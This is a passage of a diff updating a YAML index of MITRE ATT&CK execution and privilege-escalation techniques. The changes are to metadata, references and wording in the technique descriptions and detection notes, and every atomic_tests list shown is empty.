-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24228,7 +24546,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24266,30 +24584,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24336,7 +24653,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24368,8 +24685,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24383,6 +24700,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24395,16 +24716,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24470,7 +24794,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24547,66 +24870,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24619,31 +24887,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24701,9 +25021,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -24795,20 +25114,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -24836,7 +25154,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -24856,33 +25174,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24899,6 +25197,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -24909,9 +25208,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -24919,8 +25222,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -24960,7 +25279,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -24985,12 +25304,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25070,11 +25387,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25134,12 +25450,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25237,9 +25552,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25256,19 +25571,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25277,7 +25591,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25314,11 +25628,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25355,11 +25668,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25378,13 +25690,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25463,12 +25774,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25479,6 +25789,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25489,16 +25800,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25529,14 +25840,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
